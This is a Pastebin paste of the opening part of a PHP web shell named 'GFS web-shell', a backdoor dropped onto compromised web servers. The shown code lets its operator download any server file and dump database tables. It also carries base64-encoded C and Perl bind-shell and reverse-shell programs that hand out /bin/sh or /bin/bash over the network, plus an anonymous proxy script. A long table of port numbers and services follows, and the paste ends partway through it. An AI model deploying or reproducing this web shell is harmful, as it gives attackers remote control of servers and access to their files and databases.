API tools faq
paste
57R1CK3R

shell

57R1CK3R
Apr 24th, 2019
484
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 25.00 KB | None | 0 0
raw download clone embed print report
  1. <?
  2. /*
  3. *************************
  4. * ###### ##### ###### *
  5. * ###### ##### ###### *
  6. * ## ## ## *
  7. * ## #### ###### *
  8. * ## ## #### ###### *
  9. * ## ## ## ## *
  10. * ###### ## ###### *
  11. * ###### ## ###### *
  12. * *
  13. * Group Freedom Search! *
  14. *************************
  15. GFS Web-Shell
  16. */
  17. error_reporting(0);
  18. if($_POST['b_down']){
  19. $file=fopen($_POST['fname'],"r");
  20. ob_clean();
  21. $filename=basename($_POST['fname']);
  22. $filedump=fread($file,filesize($_POST['fname']));
  23. fclose($file);
  24. header("Content-type: application/octet-stream");
  25. header("Content-disposition: attachment; filename=\"".$filename."\";");
  26. echo $filedump;
  27. exit();
  28. }
  29. if($_POST['b_dtable']){
  30. $dump=down_tb($_POST['tablename'], $_POST['dbname'],$_POST['host'], $_POST['username'], $_POST['pass']);
  31. if($dump!=""){
  32. header("Content-type: application/octet-stream");
  33. header("Content-disposition: attachment; filename=\"".$_POST['tablename'].".dmp\";");
  34. echo down_tb($_POST['tablename'], $_POST['dbname'],$_POST['host'], $_POST['username'], $_POST['pass']);
  35. exit();
  36. }else
  37. die("<b>Error dump!</b><br> table=".$_POST['tablename']."<br> db=".$_POST['dbname']."<br> host=".$_POST['host']."<br> user=".$_POST['username']."<br> pass=".$_POST['pass']);
  38. }
  39. set_magic_quotes_runtime(0);
  40. set_time_limit(0);
  41. ini_set('max_execution_time',0);
  42. ini_set('output_buffering',0);
  43. if(version_compare(phpversion(), '4.1.0')==-1){
  44. $_POST=&$HTTP_POST_VARS;
  45. $_GET=&$HTTP_GET_VARS;
  46. $_SERVER=&$HTTP_SERVER_VARS;
  47. }
  48. if (get_magic_quotes_gpc()){
  49. foreach ($_POST as $k=>$v){
  50. $_POST[$k]=stripslashes($v);
  51. }
  52. foreach ($_SERVER as $k=>$v){
  53. $_SERVER[$k]=stripslashes($v);
  54. }
  55. }
  56. if ($_POST['username']==""){
  57. $_POST['username']="root";
  58. }
  59. ////////////////////////////////////////////////////////////////////////////////
  60. ///////////////////////////// Ïåðåìåííûå ///////////////////////////////////////
  61. ////////////////////////////////////////////////////////////////////////////////
  62. $server=$HTTP_SERVER_VARS['SERVER_SOFTWARE'];
  63. $r_act=$_POST['r_act'];
  64. $safe_mode=ini_get('safe_mode'); //ñòàòóñ áåçîïàñíîãî ðåæèìà
  65. $mysql_stat=function_exists('mysql_connect'); //Íàëè÷èå mysql
  66. $curl_on=function_exists('curl_version'); //íàëè÷èå cURL
  67. $dis_func=ini_get('disable_functions'); //çàáëîêèðîâàíûå ôóíêöèè
  68. $HTML=<<<html
  69. <html>
  70. <head>
  71. <title>GFS web-shell ver 3.1.7</title>
  72. </head>
  73. <body bgcolor=#86CCFF leftmargin=0 topmargin=0 marginwidth=0 marginheight=0>
  74. html;
  75. $port_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZS
  76. A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW50I
  77. GFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTsNCiBzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVt
  78. b3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyhhdG9
  79. pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0KIHNvY2tmZCA9IHNvY2tldChBRl9JTkVULF
  80. NPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIgK
  81. ikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZXdmZD1hY2NlcHQoc29ja2ZkLDAsMCk7DQog
  82. ICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk
  83. 7DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1ZikpDQogICBzeXN0ZW0oImVjaG8gd2VsY2
  84. 9tZSB0byByNTcgc2hlbGwgJiYgL2Jpbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyciwiU29ycnkiKTsNCiAgIGNsb3NlKG5ld
  85. 2ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW50ZXJlZCkgew0KaW50IGk7DQpmb3IoaT0wO2k8c3RybGVuKGVu
  86. dGVyZWQpO2krKykgDQp7DQppZihlbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQppZihlbnRlcmVkW2ldID09ICdccicpDQp
  87. lbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCkpDQpyZXR1cm4gMDsNCn0=";
  88. $port_pl="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZiAoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMS
  89. VNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0Kc29ja2V0KFMsJlBGX0lORVQs
  90. JlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVV
  91. TRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaWUgIkNhbnQgb3BlbiBwb3J0XG4iOw0KbG
  92. lzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCmFjY2VwdChDT05OLFMpOw0KaWYoISgkcGlkPWZvcmspK
  93. Q0Kew0KZGllICJDYW5ub3QgZm9yayIgaWYgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05OIjsNCm9wZW4gU1RET1VULCI+JkNPTk4i
  94. Ow0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCmNsb3N
  95. lIENPTk47DQpleGl0IDA7DQp9DQp9";
  96. $back_connect_pl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj
  97. aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR
  98. hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT
  99. sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI
  100. kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi
  101. KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl
  102. OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
  103. $back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC
  104. BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb
  105. SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd
  106. KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ
  107. sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC
  108. Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D
  109. QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp
  110. Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
  111. $prx1="IyEvaG9tZS9tZXJseW4vYmluL3BlcmwgLXcNCiMjIw0KIyMjaHR0cDovL2ZvcnVtLndlYi1oYWNrLnJ1L2luZGV4LnBocD9zaG93dG9waWM9
  112. MjY3MDYmc3Q9MCYjZW50cnkyNDYzNDQNCiMjIw0KDQp1c2Ugc3RyaWN0Ow0KJEVOVntQQVRIfSA9IGpvaW4gXCI6XCIsIHF3KC91c3IvdWNiIC9iaW4
  113. gL3Vzci9iaW4pOw0KJHwrKzsNCg0KIyMgQ29weXJpZ2h0IChjKSAxOTk2IGJ5IFJhbmRhbCBMLiBTY2h3YXJ0eg0KIyMgVGhpcyBwcm9ncmFtIGlzIG
  114. ZyZWUgc29mdHdhcmU7IHlvdSBjYW4gcmVkaXN0cmlidXRlIGl0DQojIyBhbmQvb3IgbW9kaWZ5IGl0IHVuZGVyIHRoZSBzYW1lIHRlcm1zIGFzIFBlc
  115. mwgaXRzZWxmLg0KDQojIyBBbm9ueW1vdXMgSFRUUCBwcm94eSAoaGFuZGxlcyBodHRwOiwgZ29waGVyOiwgZnRwOikNCiMjIHJlcXVpcmVzIExXUCA1
  116. LjA0IG9yIGxhdGVyDQoNCm15ICRIT1NUID0gXCJsb2NhbGhvc3RcIjsNCm15ICRQT1JUID0gXCI=";
  117. $prx2="XCI7DQoNCnN1YiBwcmVmaXggew0KIG15ICRub3cgPSBsb2NhbHRpbWU7DQoNCiBqb2luIFwiXCIsIG1hcCB7IFwiWyRub3ddIFskeyR9XSAk
  118. X1xcblwiIH0gc3BsaXQgL1xcbi8sIGpvaW4gXCJcIiwgQF87DQp9DQoNCiRTSUd7X19XQVJOX199ID0gc3ViIHsgd2FybiBwcmVmaXggQF8gfTsNCiR
  119. TSUd7X19ESUVfX30gPSBzdWIgeyBkaWUgcHJlZml4IEBfIH07DQokU0lHe0NMRH0gPSAkU0lHe0NITER9ID0gc3ViIHsgd2FpdDsgfTsNCg0KbXkgJE
  120. FHRU5UOyAgICMgZ2xvYmFsIHVzZXIgYWdlbnQgKGZvciBlZmZpY2llbmN5KQ0KQkVHSU4gew0KIHVzZSBMV1A6OlVzZXJBZ2VudDsNCg0KIEBNeUFnZ
  121. W50OjpJU0EgPSBxdyhMV1A6OlVzZXJBZ2VudCk7ICMgc2V0IGluaGVyaXRhbmNlDQoNCiAkQUdFTlQgPSBNeUFnZW50LT5uZXc7DQogJEFHRU5ULT5h
  122. Z2VudChcImFub24vMC4wN1wiKTsNCiAkQUdFTlQtPmVudl9wcm94eTsNCn0NCg0Kc3ViIE15QWdlbnQ6OnJlZGlyZWN0X29rIHsgMCB9ICMgcmVkaXJ
  123. lY3RzIHNob3VsZCBwYXNzIHRocm91Z2gNCg0KeyAgICAjIyMgTUFJTiAjIyMNCiB1c2UgSFRUUDo6RGFlbW9uOw0KDQogbXkgJG1hc3RlciA9IG5ldy
  124. BIVFRQOjpEYWVtb24NCiAgIExvY2FsQWRkciA9PiAkSE9TVCwgTG9jYWxQb3J0ID0+ICRQT1JUOw0KIHdhcm4gXCJzZXQgeW91ciBwcm94eSB0byA8V
  125. VJMOlwiLCAkbWFzdGVyLT51cmwsIFwiPlwiOw0KIG15ICRzbGF2ZTsNCiAmaGFuZGxlX2Nvbm5lY3Rpb24oJHNsYXZlKSB3aGlsZSAkc2xhdmUgPSAk
  126. bWFzdGVyLT5hY2NlcHQ7DQogZXhpdCAwOw0KfSAgICAjIyMgRU5EIE1BSU4gIyMjDQoNCnN1YiBoYW5kbGVfY29ubmVjdGlvbiB7DQogbXkgJGNvbm5
  127. lY3Rpb24gPSBzaGlmdDsgIyBIVFRQOjpEYWVtb246OkNsaWVudENvbm4NCg0KIG15ICRwaWQgPSBmb3JrOw0KIGlmICgkcGlkKSB7ICAgIyBzcGF3bi
  128. BPSywgYW5kIElcJ20gdGhlIHBhcmVudA0KICAgY2xvc2UgJGNvbm5lY3Rpb247DQogICByZXR1cm47DQogfQ0KICMjIHNwYXduIGZhaWxlZCwgb3IgS
  129. VwnbSBhIGdvb2QgY2hpbGQNCiBteSAkcmVxdWVzdCA9ICRjb25uZWN0aW9uLT5nZXRfcmVxdWVzdDsNCiBpZiAoZGVmaW5lZCgkcmVxdWVzdCkpIHsN
  130. CiAgIG15ICRyZXNwb25zZSA9ICZmZXRjaF9yZXF1ZXN0KCRyZXF1ZXN0KTsNCiAgICRjb25uZWN0aW9uLT5zZW5kX3Jlc3BvbnNlKCRyZXNwb25zZSk
  131. 7DQogICBjbG9zZSAkY29ubmVjdGlvbjsNCiB9DQogZXhpdCAwIGlmIGRlZmluZWQgJHBpZDsgIyBleGl0IGlmIElcJ20gYSBnb29kIGNoaWxkIHdpdG
  132. ggYSBnb29kIHBhcmVudA0KfQ0KDQpzdWIgZmV0Y2hfcmVxdWVzdCB7DQogbXkgJHJlcXVlc3QgPSBzaGlmdDsgICMgSFRUUDo6UmVxdWVzdA0KDQogd
  133. XNlIEhUVFA6OlJlc3BvbnNlOw0KDQogbXkgJHVybCA9ICRyZXF1ZXN0LT51cmw7DQogd2FybiBcImZldGNoaW5nICR1cmxcIjsNCiBpZiAoJHVybC0+
  134. c2NoZW1lICF+IC9eKGh0dHB8Z29waGVyfGZ0cCkkLykgew0KICAgbXkgJHJlcyA9IEhUVFA6OlJlc3BvbnNlLT5uZXcoNDAzLCBcIkZvcmJpZGRlblw
  135. iKTsNCiAgICRyZXMtPmNvbnRlbnQoXCJiYWQgc2NoZW1lOiBAe1skdXJsLT5zY2hlbWVdfVxcblwiKTsNCiAgICRyZXM7DQogfSBlbHNpZiAobm90IC
  136. R1cmwtPnJlbC0+bmV0bG9jKSB7DQogICBteSAkcmVzID0gSFRUUDo6UmVzcG9uc2UtPm5ldyg0MDMsIFwiRm9yYmlkZGVuXCIpOw0KICAgJHJlcy0+Y
  137. 29udGVudChcInJlbGF0aXZlIFVSTCBub3QgcGVybWl0dGVkXFxuXCIpOw0KICAgJHJlczsNCiB9IGVsc2Ugew0KICAgJmZldGNoX3ZhbGlkYXRlZF9y
  138. ZXF1ZXN0KCRyZXF1ZXN0KTsNCiB9DQp9DQoNCnN1YiBmZXRjaF92YWxpZGF0ZWRfcmVxdWVzdCB7DQogbXkgJHJlcXVlc3QgPSBzaGlmdDsgIyBIVFR
  139. QOjpSZXF1ZXN0DQoNCiAjIyB1c2VzIGdsb2JhbCAkQUdFTlQNCg0KICMjIHdhcm4gXCJvcmlnIHJlcXVlc3Q6IDw8PFwiLCAkcmVxdWVzdC0+aGVhZG
  140. Vyc19hc19zdHJpbmcsIFwiPj4+XCI7DQogJHJlcXVlc3QtPnJlbW92ZV9oZWFkZXIocXcoVXNlci1BZ2VudCBGcm9tIFJlZmVyZXIgQ29va2llKSk7D
  141. QogIyMgd2FybiBcImFub24gcmVxdWVzdDogPDw8XCIsICRyZXF1ZXN0LT5oZWFkZXJzX2FzX3N0cmluZywgXCI+Pj5cIjsNCiBteSAkcmVzcG9uc2Ug
  142. PSAkQUdFTlQtPnJlcXVlc3QoJHJlcXVlc3QpOw0KICMjIHdhcm4gXCJvcmlnIHJlc3BvbnNlOiA8PDxcIiwgJHJlc3BvbnNlLT5oZWFkZXJzX2FzX3N
  143. 0cmluZywgXCI+Pj5cIjsNCiAkcmVzcG9uc2UtPnJlbW92ZV9oZWFkZXIocXcoU2V0LUNvb2tpZSkpOw0KICMjIHdhcm4gXCJhbm9uIHJlc3BvbnNlOi
  144. A8PDxcIiwgJHJlc3BvbnNlLT5oZWFkZXJzX2FzX3N0cmluZywgXCI+Pj5cIjsNCiAkcmVzcG9uc2U7DQp9";
  145. $port[1] = "tcpmux (TCP Port Service Multiplexer)";
  146. $port[2] = "Management Utility";
  147. $port[3] = "Compression Process";
  148. $port[5] = "rje (Remote Job Entry)";
  149. $port[7] = "echo";
  150. $port[9] = "discard";
  151. $port[11] = "systat";
  152. $port[13] = "daytime";
  153. $port[15] = "netstat";
  154. $port[17] = "quote of the day";
  155. $port[18] = "send/rwp";
  156. $port[19] = "character generator";
  157. $port[20] = "ftp-data";
  158. $port[21] = "ftp";
  159. $port[22] = "ssh, pcAnywhere";
  160. $port[23] = "Telnet";
  161. $port[25] = "SMTP (Simple Mail Transfer)";
  162. $port[27] = "ETRN (NSW User System FE)";
  163. $port[29] = "MSG ICP";
  164. $port[31] = "MSG Authentication";
  165. $port[33] = "dsp (Display Support Protocol)";
  166. $port[37] = "time";
  167. $port[38] = "RAP (Route Access Protocol)";
  168. $port[39] = "rlp (Resource Location Protocol)";
  169. $port[41] = "Graphics";
  170. $port[42] = "nameserv, WINS";
  171. $port[43] = "whois, nickname";
  172. $port[44] = "MPM FLAGS Protocol";
  173. $port[45] = "Message Processing Module [recv]";
  174. $port[46] = "MPM [default send]";
  175. $port[47] = "NI FTP";
  176. $port[48] = "Digital Audit Daemon";
  177. $port[49] = "TACACS, Login Host Protocol";
  178. $port[50] = "RMCP, re-mail-ck";
  179. $port[53] = "DNS";
  180. $port[57] = "MTP (any private terminal access)";
  181. $port[59] = "NFILE";
  182. $port[60] = "Unassigned";
  183. $port[61] = "NI MAIL";
  184. $port[62] = "ACA Services";
  185. $port[63] = "whois++";
  186. $port[64] = "Communications Integrator (CI)";
  187. $port[65] = "TACACS-Database Service";
  188. $port[66] = "Oracle SQL*NET";
  189. $port[67] = "bootps (Bootstrap Protocol Server)";
  190. $port[68] = "bootpd/dhcp (Bootstrap Protocol Client)";
  191. $port[69] = "Trivial File Transfer Protocol (tftp)";
  192. $port[70] = "Gopher";
  193. $port[71] = "Remote Job Service";
  194. $port[72] = "Remote Job Service";
  195. $port[73] = "Remote Job Service";
  196. $port[74] = "Remote Job Service";
  197. $port[75] = "any private dial out service";
  198. $port[76] = "Distributed External Object Store";
  199. $port[77] = "any private RJE service";
  200. $port[78] = "vettcp";
  201. $port[79] = "finger";
  202. $port[80] = "World Wide Web HTTP";
  203. $port[81] = "HOSTS2 Name Serve";
  204. $port[82] = "XFER Utility";
  205. $port[83] = "MIT ML Device";
  206. $port[84] = "Common Trace Facility";
  207. $port[85] = "MIT ML Device";
  208. $port[86] = "Micro Focus Cobol";
  209. $port[87] = "any private terminal link";
  210. $port[88] = "Kerberos, WWW";
  211. $port[89] = "SU/MIT Telnet Gateway";
  212. $port[90] = "DNSIX Securit Attribute Token Map";
  213. $port[91] = "MIT Dover Spooler";
  214. $port[92] = "Network Printing Protocol";
  215. $port[93] = "Device Control Protocol";
  216. $port[94] = "Tivoli Object Dispatcher";
  217. $port[95] = "supdup";
  218. $port[96] = "DIXIE";
  219. $port[98] = "linuxconf";
  220. $port[99] = "Metagram Relay";
  221. $port[100] = "[unauthorized use]";
  222. $port[101] = "HOSTNAME";
  223. $port[102] = "ISO, X.400, ITOT";
  224. $port[103] = "Genesis Point-to-Point";
  225. $port[104] = "ACR-NEMA Digital Imag. & Comm. 300";
  226. $port[105] = "CCSO name server protocol";
  227. $port[106] = "poppassd";
  228. $port[107] = "Remote Telnet Service";
  229. $port[108] = "SNA Gateway Access Server";
  230. $port[109] = "POP2";
  231. $port[110] = "POP3";
  232. $port[111] = "Sun RPC Portmapper";
  233. $port[112] = "McIDAS Data Transmission Protocol";
  234. $port[113] = "Authentication Service";
  235. $port[115] = "sftp (Simple File Transfer Protocol)";
  236. $port[116] = "ANSA REX Notify";
  237. $port[117] = "UUCP Path Service";
  238. $port[118] = "SQL Services";
  239. $port[119] = "NNTP";
  240. $port[120] = "CFDP";
  241. $port[123] = "NTP";
  242. $port[124] = "SecureID";
  243. $port[129] = "PWDGEN";
  244. $port[133] = "statsrv";
  245. $port[135] = "loc-srv/epmap";
  246. $port[137] = "netbios-ns";
  247. $port[138] = "netbios-dgm (UDP)";
  248. $port[139] = "NetBIOS";
  249. $port[143] = "IMAP";
  250. $port[144] = "NewS";
  251. $port[150] = "SQL-NET";
  252. $port[152] = "BFTP";
  253. $port[153] = "SGMP";
  254. $port[156] = "SQL Service";
  255. $port[161] = "SNMP";
  256. $port[175] = "vmnet";
  257. $port[177] = "XDMCP";
  258. $port[178] = "NextStep Window Server";
  259. $port[179] = "BGP";
  260. $port[180] = "SLmail admin";
  261. $port[199] = "smux";
  262. $port[210] = "Z39.50";
  263. $port[213] = "IPX";
  264. $port[218] = "MPP";
  265. $port[220] = "IMAP3";
  266. $port[256] = "RAP";
  267. $port[257] = "Secure Electronic Transaction";
  268. $port[258] = "Yak Winsock Personal Chat";
  269. $port[259] = "ESRO";
  270. $port[264] = "FW1_topo";
  271. $port[311] = "Apple WebAdmin";
  272. $port[350] = "MATIP type A";
  273. $port[351] = "MATIP type B";
  274. $port[363] = "RSVP tunnel";
  275. $port[366] = "ODMR (On-Demand Mail Relay)";
  276. $port[371] = "Clearcase";
  277. $port[387] = "AURP (AppleTalk Update-Based Routing Protocol)";
  278. $port[389] = "LDAP";
  279. $port[407] = "Timbuktu";
  280. $port[427] = "Server Location";
  281. $port[434] = "Mobile IP";
  282. $port[443] = "ssl";
  283. $port[444] = "snpp, Simple Network Paging Protocol";
  284. $port[445] = "SMB";
  285. $port[458] = "QuickTime TV/Conferencing";
  286. $port[468] = "Photuris";
  287. $port[475] = "tcpnethaspsrv";
  288. $port[500] = "ISAKMP, pluto";
  289. $port[511] = "mynet-as";
  290. $port[512] = "biff, rexec";
  291. $port[513] = "who, rlogin";
  292. $port[514] = "syslog, rsh";
  293. $port[515] = "lp, lpr, line printer";
  294. $port[517] = "talk";
  295. $port[520] = "RIP (Routing Information Protocol)";
  296. $port[521] = "RIPng";
  297. $port[522] = "ULS";
  298. $port[531] = "IRC";
  299. $port[543] = "KLogin, AppleShare over IP";
  300. $port[545] = "QuickTime";
  301. $port[548] = "AFP";
  302. $port[554] = "Real Time Streaming Protocol";
  303. $port[555] = "phAse Zero";
  304. $port[563] = "NNTP over SSL";
  305. $port[575] = "VEMMI";
  306. $port[581] = "Bundle Discovery Protocol";
  307. $port[593] = "MS-RPC";
  308. $port[608] = "SIFT/UFT";
  309. $port[626] = "Apple ASIA";
  310. $port[631] = "IPP (Internet Printing Protocol)";
  311. $port[635] = "RLZ DBase";
  312. $port[636] = "sldap";
  313. $port[642] = "EMSD";
  314. $port[648] = "RRP (NSI Registry Registrar Protocol)";
  315. $port[655] = "tinc";
  316. $port[660] = "Apple MacOS Server Admin";
  317. $port[666] = "Doom";
  318. $port[674] = "ACAP";
  319. $port[687] = "AppleShare IP Registry";
  320. $port[700] = "buddyphone";
  321. $port[705] = "AgentX for SNMP";
  322. $port[901] = "swat, realsecure";
  323. $port[993] = "s-imap";
  324. $port[995] = "s-pop";
  325. $port[1024] = "Reserved";
  326. $port[1025] = "network blackjack";
  327. $port[1062] = "Veracity";
  328. $port[1080] = "SOCKS";
  329. $port[1085] = "WebObjects";
  330. $port[1227] = "DNS2Go";
  331. $port[1243] = "SubSeven";
  332. $port[1338] = "Millennium Worm";
  333. $port[1352] = "Lotus Notes";
  334. $port[1381] = "Apple Network License Manager";
  335. $port[1417] = "Timbuktu Service 1 Port";
  336. $port[1418] = "Timbuktu Service 2 Port";
  337. $port[1419] = "Timbuktu Service 3 Port";
  338. $port[1420] = "Timbuktu Service 4 Port";
  339. $port[1433] = "Microsoft SQL Server";
  340. $port[1434] = "Microsoft SQL Monitor";
  341. $port[1477] = "ms-sna-server";
  342. $port[1478] = "ms-sna-base";
  343. $port[1490] = "insitu-conf";
  344. $port[1494] = "Citrix ICA Protocol";
  345. $port[1498] = "Watcom-SQL";
  346. $port[1500] = "VLSI License Manager";
  347. $port[1503] = "T.120";
  348. $port[1521] = "Oracle SQL";
  349. $port[1522] = "Ricardo North America License Manager";
  350. $port[1524] = "ingres";
  351. $port[1525] = "prospero";
  352. $port[1526] = "prospero";
  353. $port[1527] = "tlisrv";
  354. $port[1529] = "oracle";
  355. $port[1547] = "laplink";
  356. $port[1604] = "Citrix ICA, MS Terminal Server";
  357. $port[1645] = "RADIUS Authentication";
  358. $port[1646] = "RADIUS Accounting";
  359. $port[1680] = "Carbon Copy";
  360. $port[1701] = "L2TP/LSF";
  361. $port[1717] = "Convoy";
  362. $port[1720] = "H.323/Q.931";
  363. $port[1723] = "PPTP control port";
  364. $port[1731] = "MSICCP";
  365. $port[1755] = "Windows Media .asf";
  366. $port[1758] = "TFTP multicast";
  367. $port[1761] = "cft-0";
  368. $port[1762] = "cft-1";
  369. $port[1763] = "cft-2";
  370. $port[1764] = "cft-3";
  371. $port[1765] = "cft-4";
  372. $port[1766] = "cft-5";
  373. $port[1767] = "cft-6";
  374. $port[1808] = "Oracle-VP2";
  375. $port[1812] = "RADIUS server";
  376. $port[1813] = "RADIUS accounting";
  377. $port[1818] = "ETFTP";
  378. $port[1973] = "DLSw DCAP/DRAP";
  379. $port[1985] = "HSRP";
  380. $port[1999] = "Cisco AUTH";
  381. $port[2001] = "glimpse";
  382. $port[2049] = "NFS";
  383. $port[2064] = "distributed.net";
  384. $port[2065] = "DLSw";
  385. $port[2066] = "DLSw";
  386. $port[2106] = "MZAP";
  387. $port[2140] = "DeepThroat";
  388. $port[2301] = "Compaq Insight Management Web Agents";
  389. $port[2327] = "Netscape Conference";
  390. $port[2336] = "Apple UG Control";
  391. $port[2427] = "MGCP gateway";
  392. $port[2504] = "WLBS";
  393. $port[2535] = "MADCAP";
  394. $port[2543] = "sip";
  395. $port[2592] = "netrek";
  396. $port[2727] = "MGCP call agent";
  397. $port[2628] = "DICT";
  398. $port[2998] = "ISS Real Secure Console Service Port";
  399. $port[3000] = "Firstclass";
  400. $port[3001] = "Redwood Broker";
  401. $port[3031] = "Apple AgentVU";
  402. $port[3128] = "squid";
  403. $port[3130] = "ICP";
  404. $port[3150] = "DeepThroat";
  405. $port[3264] = "ccmail";
  406. $port[3283] = "Apple NetAssitant";
  407. $port[3288] = "COPS";
  408. $port[3305] = "ODETTE";
  409. $port[3306] = "mySQL";
  410. $port[3389] = "RDP Protocol (Terminal Server)";
  411. $port[3521] = "netrek";
  412. $port[4000] = "icq, command-n-conquer and shell nfm";
  413. $port[4321] = "rwhois";
  414. $port[4333] = "mSQL";
  415. $port[4444] = "KRB524";
  416. $port[4827] = "HTCP";
  417. $port[5002] = "radio free ethernet";
  418. $port[5004] = "RTP";
  419. $port[5005] = "RTP";
  420. $port[5010] = "Yahoo! Messenger";
  421. $port[5050] = "multimedia conference control tool";
  422. $port[5060] = "SIP";
  423. $port[5150] = "Ascend Tunnel Management Protocol";
  424. $port[5190] = "AIM";
  425. $port[5500] = "securid";
  426. $port[5501] = "securidprop";
  427. $port[5423] = "Apple VirtualUser";
  428. $port[5555] = "Personal Agent";
  429. $port[5631] = "PCAnywhere data";
  430. $port[5632] = "PCAnywhere";
  431. $port[5678] = "Remote Replication Agent Connection";
  432. $port[5800] = "VNC";
  433. $port[5801] = "VNC";
  434. $port[5900] = "VNC";
  435. $port[5901] = "VNC";
  436. $port[6000] = "X Windows";
  437. $port[6112] = "BattleNet";
  438. $port[6502] = "Netscape Conference";
  439. $port[6667] = "IRC";
